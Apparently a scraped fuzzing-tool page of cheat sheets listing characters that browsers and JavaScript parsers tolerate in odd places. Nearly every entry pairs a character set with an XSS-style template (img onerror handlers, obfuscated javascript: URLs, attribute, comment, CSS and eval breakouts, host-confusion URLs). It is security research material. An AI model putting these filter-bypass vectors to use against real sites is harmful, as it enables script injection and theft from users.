Cheat sheets

Vector background

Find WAF bypass for eval context

try { v = "javascript:(1)"; if (eval(v)) { console.log(v); log('$[i]') } } catch(e) { v = '' }

How do you use it?

Vector background

Non-standard characters that break JSON.parse()

NUL SOH STX ETX EOT ENQ ACK BEL BS VT FF SO SI DLE DC1 DC2 DC3 DC4 NAK SYNC ETB CAN EM SUB ESC FS GS RS US
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":" [1]"}`); } } catch { log($[i]); }

How do you use it?

[1]
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"NUL"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"SOH"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"STX"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"ETX"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"EOT"}`); } } catch { log($[i]); }
Vector background

Characters that can be between < and script>

<
< [1]script><notfound></script>

How do you use it?

[1]
<<script><notfound></script>
Vector background

Characters that cause the backslash to be consumed with a big5 charset

\
<script>" [1]\"-log($[i])//"</script>

How do you use it?

[1]
<script>"\\"-log($[i])//"</script>
Vector background

Characters that can precede the javascript protocol

SOH STX ETX EOT ENQ ACK BEL BS HT LF VT FF CR SO SI DLE DC1 DC2 DC3 DC4 NAK SYNC ETB CAN EM SUB ESC FS GS RS US SPACE
<a href=" [1]javascript:test.com/" id="test"></a>

How do you use it?

[1]
<a href="SOHjavascript:test.com/" id="test"></a>
<a href="STXjavascript:test.com/" id="test"></a>
<a href="ETXjavascript:test.com/" id="test"></a>
<a href="EOTjavascript:test.com/" id="test"></a>
<a href="ENQjavascript:test.com/" id="test"></a>
Vector background

Characters that close or encapsulate HTML attribute values

HT LF FF CR SPACE " '
<img src= [1]xonerror=log($[i])>

How do you use it?

[1]
<img src=HTxonerror=log($[i])>
<img src=LFxonerror=log($[i])>
<img src=FFxonerror=log($[i])>
<img src=CRxonerror=log($[i])>
<img src=SPACExonerror=log($[i])>
Vector background

< removal bypass

<
<p> [1]found></p>

How do you use it?

[1]
<p><found></p>
Vector background

Characters in-between square brackets that close cdata

]
<svg><style> x = "<![CDATA[</style><img title="] [1]]></style></svg><img src onerror=log($[i])>">

How do you use it?

[1]
<svg><style> x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=log($[i])>">
Vector background

Includes Validation Chars Allowed

\
if (['https:'].includes(" [1]https:")){ log($[i]) }

How do you use it?

[1]
if (['https:'].includes("\https:")){ log($[i]) }
Vector background

work

>
<img src= [1]{"[alert]"}<found>

How do you use it?

[1]
<img src=>{"[alert]"}<found>
Vector background

HTML vector

>
<image/src/onerror= [1]$[data1]$[data2]<found>

How do you use it?

[1]
<image/src/onerror=>$[data1]$[data2]<found>
Vector background

Chars allowed before domain

<a href="https://.example.com/" id="test$[i]"></a>

How do you use it?

Vector background

Characters allowed in colon entity

<a href="javascript&colon;abcd" id="x">f</a>

How do you use it?

Vector background

Characters allowed between multiple HTML attributes

HT LF FF CR SPACE
<img [1]src=xonerror=log($[i])>

How do you use it?

[1]
<imgHTsrc=xonerror=log($[i])>
<imgLFsrc=xonerror=log($[i])>
<imgFFsrc=xonerror=log($[i])>
<imgCRsrc=xonerror=log($[i])>
<imgSPACEsrc=xonerror=log($[i])>
Vector background

Bypass __proto__ string match defense

s = "$[i]"; if (typeof s["__proto__"] != "undefined") { log(fromCodePoint($[i])); }

How do you use it?

Vector background

Characters allowed in path traversal

HT # / ? \
new URL("https://x.se/long/.. [1]/a").pathname.length > 4 ? false : log($[i])

How do you use it?

[1]
new URL("https://x.se/long/..HT/a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..#/a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..//a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..?/a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..\/a").pathname.length > 4 ? false : log($[i])
Vector background

Characters allowed before event in attribute name using setAttribute

\
let img = document.createElement('img'); img.src = 'data:'; img.setAttribute(' [1]onerror','log($[i])') document.body.append(img);

How do you use it?

[1]
let img = document.createElement('img'); img.src = 'data:'; img.setAttribute('\onerror','log($[i])') document.body.append(img);
Vector background

Characters that can work as attribute seperator

HT LF FF CR SPACE /
var markup = `<a [1]id=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }

How do you use it?

[1]
var markup = `<aHTid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aLFid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aFFid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aCRid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aSPACEid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
Vector background

Characters that can start an HTML comment

! / ?
< [1] <a/b="--><found>"

How do you use it?

[1]
<! <a/b="--><found>"
</ <a/b="--><found>"
<? <a/b="--><found>"
Vector background

Fuzzing weird script behaviour after script text

/ HT CR FF LF SPACE >
<script> x = "<!--<script [1]>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>

How do you use it?

[1]
<script> x = "<!--<script/>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptHT>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptCR>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptFF>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptLF>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
Vector background

Characters allowed to end a JS string

"
var myVar = "foo [1] log($[i]) // a";

How do you use it?

[1]
var myVar = "foo" log($[i]) // a";
Vector background

JavaScript Scheme starting with http

log(new URL("httpjavascript:alert()").protocol)

How do you use it?

Vector background

Characters allowed before CSS selectors

HT LF FF CR SPACE
<style> [1]div{color:red;} </style> <div id=x>test</div>

How do you use it?

[1]
<style> HTdiv{color:red;} </style> <div id=x>test</div>
<style> LFdiv{color:red;} </style> <div id=x>test</div>
<style> FFdiv{color:red;} </style> <div id=x>test</div>
<style> CRdiv{color:red;} </style> <div id=x>test</div>
<style> SPACEdiv{color:red;} </style> <div id=x>test</div>
Vector background

Host

if (new URL('https://www.example.com/evil.com').host=='evil.com') { log('"https://www.example.com/evil.com" -> "evil.com"') } if (new URL('https://www.example.comevil.com').host=='evil.com') { log('"https://www.example.comevil.com" -> "evil.com"') }

How do you use it?

Vector background

ToUpperCase Improper Character Morphing

var targets=['"','\'','<','/','>','\\'] if (targets.includes(''.toUpperCase())) { log($[i]+' (normal) ( -> '+"".toUpperCase()+')') } if (targets.includes(''.toLocaleUpperCase())) { log($[i]+' (locale) ( -> '+"".toLocaleUpperCase()+')') }

How do you use it?

Vector background

Characters that can break out of an inline style background-image url

<div id="test" style="background-image: url(;width:100%">hello</div>

How do you use it?

Vector background

Characters that can break out of an inline style with single quotes

<div id="test" style='onload="alert(1)">hello</div>

How do you use it?

Vector background

Characters that can break out of an inline style with double quotes

<div id="test" style="onload="alert(1)">hello</div>

How do you use it?

Vector background

HTML-Encoded Attribute Escape

<img src="/image.png" tag="html()><iframe><!--">

How do you use it?

Vector background

Quotes

<img src="<iframe><!--">

How do you use it?

Vector background

Characters allowed after malformed entities

- LF \u2009 \u2000 \u2003 \u2007 HT \u2008 \u2004 SPACE VT \u1680 \u2006 & \u202f \xa0 \u200a \ufeff ~ FF \u2005 ! ; CR \u3000 \u2001 \u2002 \u2028 + \u205f \u2029
<img src=data: onerror="1&amp [1]log($[i])">

How do you use it?

[1]
<img src=data: onerror="1&amp-log($[i])">
<img src=data: onerror="1&ampLFlog($[i])">
<img src=data: onerror="1&amp\u2009log($[i])">
<img src=data: onerror="1&amp\u2000log($[i])">
<img src=data: onerror="1&amp\u2003log($[i])">
Vector background

Characters allowed to break double quotes

<form id="test" action="aaaonsubmit=alert(1)><input/type='submit'>

How do you use it?

Vector background

JavaScript Scheme starting with https://

if (new URL("https://javascript:alert()").protocol=="javascript:"){log($[i])}

How do you use it?

Vector background

Characters allowed after greater than in events

\ufeff \u2028 > ~ \u3000 \u2003 \u2000 \u2004 \u2006 ! \u2029 - \xa0 \u2005 \u2008 + \u200a SPACE \u1680 \u2002 \u2007 \u2009 LF \u205f ; \u202f HT FF VT CR \u2001
<img src=data: onerror="1&gt [1] log($[i])">

How do you use it?

[1]
<img src=data: onerror="1&gt\ufeff log($[i])">
<img src=data: onerror="1&gt\u2028 log($[i])">
<img src=data: onerror="1&gt> log($[i])">
<img src=data: onerror="1&gt~ log($[i])">
<img src=data: onerror="1&gt\u3000 log($[i])">
Vector background

Characters that act as new lines in multi line strings

LF CR \u2028 \u2029
"x\ [1]"==="x" && log($[i])

How do you use it?

[1]
"x\LF"==="x" && log($[i])
"x\CR"==="x" && log($[i])
"x\\u2028"==="x" && log($[i])
"x\\u2029"==="x" && log($[i])
Vector background

characters allowed between exclamation mark and greater then

>
<!----! [1]><found>

How do you use it?

[1]
<!----!>><found>
Vector background

Characters ignored after backslash with multiline string

CR
({"x\ [1] ":1337}.x)==1337&&log($[i])

How do you use it?

[1]
({"x\CR ":1337}.x)==1337&&log($[i])
Vector background

Characters ignored in strings when doing a non strict comparison

HT VT FF SPACE + 0 \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
" [1]1337"==1337&&log($[i])

How do you use it?

[1]
"HT1337"==1337&&log($[i])
"VT1337"==1337&&log($[i])
"FF1337"==1337&&log($[i])
"SPACE1337"==1337&&log($[i])
"+1337"==1337&&log($[i])
Vector background

Characters that act as attribute quotes

" '
<div a= [1]><!-- ></div><img src=x:x onerror=log($[i]) -->

How do you use it?

[1]
<div a="><!-- ></div><img src=x:x onerror=log($[i]) -->
<div a='><!-- ></div><img src=x:x onerror=log($[i]) -->
Vector background

Characters ignored in an attribute name

HT LF FF CR SPACE / >
<div [1]="><img src=x:x onerror=log($[i])>"></div>

How do you use it?

[1]
<div HT="><img src=x:x onerror=log($[i])>"></div>
<div LF="><img src=x:x onerror=log($[i])>"></div>
<div FF="><img src=x:x onerror=log($[i])>"></div>
<div CR="><img src=x:x onerror=log($[i])>"></div>
<div SPACE="><img src=x:x onerror=log($[i])>"></div>
Vector background

Characters that can be used in eval to write code in between

HT VT FF SPACE ; \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
eval(' [1]log($[i])')

How do you use it?

[1]
eval('HTlog($[i])')
eval('VTlog($[i])')
eval('FFlog($[i])')
eval('SPACElog($[i])')
eval(';log($[i])')
Vector background

Characters to break out from eval string

"
eval('" [1]');log($[i]);

How do you use it?

[1]
eval('""');log($[i]);
Vector background

Valid characters between function and dot-parenthesis .()

?
prompt [1].();log($[i])

How do you use it?

[1]
prompt?.();log($[i])
Vector background

Valid characters between function and parenthesis

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
alert [1]();log($[i])

How do you use it?

[1]
alertHT();log($[i])
alertLF();log($[i])
alertVT();log($[i])
alertFF();log($[i])
alertCR();log($[i])
Vector background

Characters allowed between < and element

<h1>sample</h1>

How do you use it?

Vector background

Attribute separators

<imgonerror=alert() src=x />

How do you use it?

Vector background

Characters allowed before optional chaining

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
log [1]?. [2]($[i])

How do you use it?

[1]
logHT?. ($[i])
logLF?. ($[i])
logVT?. ($[i])
logFF?. ($[i])
logCR?. ($[i])
[2]
log ?.HT($[i])
log ?.LF($[i])
log ?.VT($[i])
log ?.FF($[i])
log ?.CR($[i])
Vector background

Characters allowed before the tag attribute and equals.

HT LF FF CR SPACE
<div style [1]="color:red;">test</div>

How do you use it?

[1]
<div styleHT="color:red;">test</div>
<div styleLF="color:red;">test</div>
<div styleFF="color:red;">test</div>
<div styleCR="color:red;">test</div>
<div styleSPACE="color:red;">test</div>
Vector background

Characters allowed after the void operator

HT LF VT FF CR SPACE ! + - ~ \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
void [1]log($[i])

How do you use it?

[1]
voidHTlog($[i])
voidLFlog($[i])
voidVTlog($[i])
voidFFlog($[i])
voidCRlog($[i])
Vector background

Characters that can be used as valid labels in JavaScript

$ _ \xaa \xb5 \xba \u02ec \u02ee \u037f \u0386 \u038c \u0559 \u06d5 \u06ff \u0710 \u07b1 \u07fa \u081a \u0824 \u0828 \u093d \u0950 \u09b2 \u09bd \u09ce \u09fc \u0a5e \u0abd \u0ad0 \u0af9 \u0b3d \u0b71 \u0b83 \u0b9c \u0bd0 \u0c3d \u0c5d \u0c80 \u0cbd \u0d3d \u0d4e \u0dbd \u0e84 \u0ea5 \u0ebd \u0ec6 \u0f00 \u103f \u1061 \u108e \u10c7 \u10cd \u1258 \u12c0 \u17d7 \u17dc \u18aa \u1aa7 \u1cfa \u1f59 \u1f5b \u1f5d \u1fbe \u2071 \u207f \u2102 \u2107 \u2115 \u2124 \u2126 \u2128 \u214e \u2d27 \u2d2d \u2d6f \ua7d3 \ua8fb \ua9cf \uaa7a \uaab1 \uaac0 \uaac2 \ufb1d \ufb3e \u{010808} \u{01083c} \u{010a00} \u{010f27} \u{011075} \u{011144} \u{011147} \u{011176} \u{0111da} \u{0111dc} \u{011288} \u{01133d} \u{011350} \u{0114c7} \u{011644} \u{0116b8} \u{011909} \u{01193f} \u{011941} \u{0119e1} \u{0119e3} \u{011a00} \u{011a3a} \u{011a50} \u{011a9d} \u{011c40} \u{011d46} \u{011d98} \u{011f02} \u{011fb0} \u{016f50} \u{016fe3} \u{01b132} \u{01b155} \u{01d4a2} \u{01d4bb} \u{01d546} \u{01e14e} \u{01e94b} \u{01ee24} \u{01ee27} \u{01ee39} \u{01ee3b} \u{01ee42} \u{01ee47} \u{01ee49} \u{01ee4b} \u{01ee54} \u{01ee57} \u{01ee59} \u{01ee5b} \u{01ee5d} \u{01ee5f} \u{01ee64} \u{01ee7e}
[1]:log($[i])

How do you use it?

[1]
$:log($[i])
_:log($[i])
\xaa:log($[i])
\xb5:log($[i])
\xba:log($[i])
Vector background

Characters that are valid JS variables

$ _ \xaa \xb5 \xba \u02ec \u02ee \u037f \u0386 \u038c \u0559 \u06d5 \u06ff \u0710 \u07b1 \u07fa \u081a \u0824 \u0828 \u093d \u0950 \u09b2 \u09bd \u09ce \u09fc \u0a5e \u0abd \u0ad0 \u0af9 \u0b3d \u0b71 \u0b83 \u0b9c \u0bd0 \u0c3d \u0c5d \u0c80 \u0cbd \u0d3d \u0d4e \u0dbd \u0e84 \u0ea5 \u0ebd \u0ec6 \u0f00 \u103f \u1061 \u108e \u10c7 \u10cd \u1258 \u12c0 \u17d7 \u17dc \u18aa \u1aa7 \u1cfa \u1f59 \u1f5b \u1f5d \u1fbe \u2071 \u207f \u2102 \u2107 \u2115 \u2124 \u2126 \u2128 \u214e \u2d27 \u2d2d \u2d6f \ua7d3 \ua8fb \ua9cf \uaa7a \uaab1 \uaac0 \uaac2 \ufb1d \ufb3e \u{010808} \u{01083c} \u{010a00} \u{010f27} \u{011075} \u{011144} \u{011147} \u{011176} \u{0111da} \u{0111dc} \u{011288} \u{01133d} \u{011350} \u{0114c7} \u{011644} \u{0116b8} \u{011909} \u{01193f} \u{011941} \u{0119e1} \u{0119e3} \u{011a00} \u{011a3a} \u{011a50} \u{011a9d} \u{011c40} \u{011d46} \u{011d98} \u{011f02} \u{011fb0} \u{016f50} \u{016fe3} \u{01b132} \u{01b155} \u{01d4a2} \u{01d4bb} \u{01d546} \u{01e14e} \u{01e94b} \u{01ee24} \u{01ee27} \u{01ee39} \u{01ee3b} \u{01ee42} \u{01ee47} \u{01ee49} \u{01ee4b} \u{01ee54} \u{01ee57} \u{01ee59} \u{01ee5b} \u{01ee5d} \u{01ee5f} \u{01ee64} \u{01ee7e}
var [1]=log($[i])

How do you use it?

[1]
var $=log($[i])
var _=log($[i])
var \xaa=log($[i])
var \xb5=log($[i])
var \xba=log($[i])
Vector background

Characters allowed instead of equal sign

=
<img src onerror [1]log($[i])>

How do you use it?

[1]
<img src onerror=log($[i])>
Vector background

Characters between < and element name

<
HT LF FF CR SPACE / >
< [1]found [2]>

How do you use it?

[1]
<<found >
[2]
<foundHT>
<foundLF>
<foundFF>
<foundCR>
<foundSPACE>
Vector background

Characters allowed between an object and bracket notation

HT LF VT FF CR SPACE % & * + , - / : ; < = > ^ | \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
document [1]['location'];log($[i])

How do you use it?

[1]
documentHT['location'];log($[i])
documentLF['location'];log($[i])
documentVT['location'];log($[i])
documentFF['location'];log($[i])
documentCR['location'];log($[i])
Vector background

Characters allowed between an object and the dot operator

HT LF VT FF CR SPACE ? \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
window [1].alert();log($[i])

How do you use it?

[1]
windowHT.alert();log($[i])
windowLF.alert();log($[i])
windowVT.alert();log($[i])
windowFF.alert();log($[i])
windowCR.alert();log($[i])
Vector background

Characters that can be inserted in the middle of the JS protocol name

HT LF CR
<a id="0" href="j [1]avascript:window">craft-me</a>

How do you use it?

[1]
<a id="0" href="jHTavascript:window">craft-me</a>
<a id="0" href="jLFavascript:window">craft-me</a>
<a id="0" href="jCRavascript:window">craft-me</a>
Vector background

Characters allowed in-between operators

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
"1337" [1]inlog($[i])

How do you use it?

[1]
"1337"HTinlog($[i])
"1337"LFinlog($[i])
"1337"VTinlog($[i])
"1337"FFinlog($[i])
"1337"CRinlog($[i])
Vector background

Characters allowed in-between hyphens

-
<!- [1]- ><xmp>--><img src/onerror=log($[i])>-->

How do you use it?

[1]
<!--- ><xmp>--><img src/onerror=log($[i])>-->
Vector background

Characters allowed as a class separator

HT LF FF CR SPACE
<div class=" [1]x"></div>

How do you use it?

[1]
<div class="HTx"></div>
<div class="LFx"></div>
<div class="FFx"></div>
<div class="CRx"></div>
<div class="SPACEx"></div>
Vector background

Characters that act like new line or single line comment

LF CR & * / ; < = > ? | \u2028 \u2029
log($[i]) [1]sdfasdfasfasfd

How do you use it?

[1]
log($[i])LFsdfasdfasfasfd
log($[i])CRsdfasdfasfasfd
log($[i])&sdfasdfasfasfd
log($[i])*sdfasdfasfasfd
log($[i])/sdfasdfasfasfd
Vector background

Characters that act as quotes or whitespace

HT LF FF CR SPACE " ' ;
<div style= [1]color:red></div>

How do you use it?

[1]
<div style=HTcolor:red></div>
<div style=LFcolor:red></div>
<div style=FFcolor:red></div>
<div style=CRcolor:red></div>
<div style=SPACEcolor:red></div>
Vector background

Characters allowed between HTML attributes

HT LF FF CR SPACE /
<img [1]srconerror=log($[i])>

How do you use it?

[1]
<imgHTsrconerror=log($[i])>
<imgLFsrconerror=log($[i])>
<imgFFsrconerror=log($[i])>
<imgCRsrconerror=log($[i])>
<imgSPACEsrconerror=log($[i])>
Vector background

Valid characters before domain 1

HT LF CR / @ \ \xad \u034f \u180b \u180c \u180d \u180f \u200b \u2060 \u2064 \ufe00 \ufe01 \ufe02 \ufe03 \ufe04 \ufe05 \ufe06 \ufe07 \ufe08 \ufe09 \ufe0a \ufe0b \ufe0c \ufe0d \ufe0e \ufe0f \ufeff
<a href="https:// [1]example.com/" id="test$[i]"></a>

How do you use it?

[1]
<a href="https://HTexample.com/" id="test$[i]"></a>
<a href="https://LFexample.com/" id="test$[i]"></a>
<a href="https://CRexample.com/" id="test$[i]"></a>
<a href="https:///example.com/" id="test$[i]"></a>
<a href="https://@example.com/" id="test$[i]"></a>
Vector background

Characters that can break out of a single line comment

LF CR \u2028 \u2029
// [1]log($[i])

How do you use it?

[1]
// LFlog($[i])
// CRlog($[i])
// \u2028log($[i])
// \u2029log($[i])
Vector background

Characters allowed javascript and colon

HT : \
if (new URL("javascript [1]:alert()").protocol=="javascript:"){log($[i])}

How do you use it?

[1]
if (new URL("javascriptHT:alert()").protocol=="javascript:"){log($[i])}
if (new URL("javascript::alert()").protocol=="javascript:"){log($[i])}
if (new URL("javascript\:alert()").protocol=="javascript:"){log($[i])}
Vector background

Characters allowed between variable name and equals sign

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
const x [1]="x" if(x==="x"){log($[i])}

How do you use it?

[1]
const xHT="x" if(x==="x"){log($[i])}
const xLF="x" if(x==="x"){log($[i])}
const xVT="x" if(x==="x"){log($[i])}
const xFF="x" if(x==="x"){log($[i])}
const xCR="x" if(x==="x"){log($[i])}
Vector background

Characters allowed between slashes

HT / \
anchor.href='/ [1]/example.com'; if(anchor.host === 'example.com')log($[i])

How do you use it?

[1]
anchor.href='/HT/example.com'; if(anchor.host === 'example.com')log($[i])
anchor.href='///example.com'; if(anchor.host === 'example.com')log($[i])
anchor.href='/\/example.com'; if(anchor.host === 'example.com')log($[i])
Vector background

Break out of CSS strings

LF FF CR '
<div style="font-family:'x [1];color:red;';">test</div>

How do you use it?

[1]
<div style="font-family:'xLF;color:red;';">test</div>
<div style="font-family:'xFF;color:red;';">test</div>
<div style="font-family:'xCR;color:red;';">test</div>
<div style="font-family:'x';color:red;';">test</div>
Vector background

characters after slash that make a http protocol

/ \
<a href="/ [1]test.com/" id="test$[i]"></a>

How do you use it?

[1]
<a href="//test.com/" id="test$[i]"></a>
<a href="/\test.com/" id="test$[i]"></a>
Vector background

Characters after strings

LF CR % & * + , - / ; < > ^ | \u2028 \u2029
"" [1]log($[i])

How do you use it?

[1]
""LFlog($[i])
""CRlog($[i])
""%log($[i])
""&log($[i])
""*log($[i])
Vector background

Characters allowed between in operator

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
1337 [1]inlog($[i])

How do you use it?

[1]
1337HTinlog($[i])
1337LFinlog($[i])
1337VTinlog($[i])
1337FFinlog($[i])
1337CRinlog($[i])
Vector background

Characters that separate CSS properties

;
<div style="font-family:'blah' [1]color:red"></div>

How do you use it?

[1]
<div style="font-family:'blah';color:red"></div>
Vector background

Character that closes HTML tag

>
<img src=x [1]<found>

How do you use it?

[1]
<img src=x><found>
Vector background

JavaScript separators between function names

LF CR % & * + , - / ; < > ^ | \u2028 \u2029
console.log() [1]log($[i])

How do you use it?

[1]
console.log()LFlog($[i])
console.log()CRlog($[i])
console.log()%log($[i])
console.log()&log($[i])
console.log()*log($[i])
Vector background

Character allowed after onerror event

HT LF FF CR SPACE
<img src=x onerror [1]=log($[i])>

How do you use it?

[1]
<img src=x onerrorHT=log($[i])>
<img src=x onerrorLF=log($[i])>
<img src=x onerrorFF=log($[i])>
<img src=x onerrorCR=log($[i])>
<img src=x onerrorSPACE=log($[i])>
Vector background

Characters allowed before parentheses

HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
HT LF VT FF CR SPACE ; \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
log [1]($[i]) [2]

How do you use it?

[1]
logHT($[i])
logLF($[i])
logVT($[i])
logFF($[i])
logCR($[i])
[2]
log ($[i])HT
log ($[i])LF
log ($[i])VT
log ($[i])FF
log ($[i])CR
Vector background

Characters allowed after * in CSS comments

/
<div style="/** [1]color:red;">test</div>

How do you use it?

[1]
<div style="/**/color:red;">test</div>
Vector background

Characters allowed before onerror events

HT LF FF CR SPACE /
<img src [1]onerror=log($[i])>

How do you use it?

[1]
<img src HTonerror=log($[i])>
<img src LFonerror=log($[i])>
<img src FFonerror=log($[i])>
<img src CRonerror=log($[i])>
<img src SPACEonerror=log($[i])>
Vector background

HTML comment before greater than

! - >
<!---- [1]><found>

How do you use it?

[1]
<!----!><found>
<!-----><found>
<!---->><found>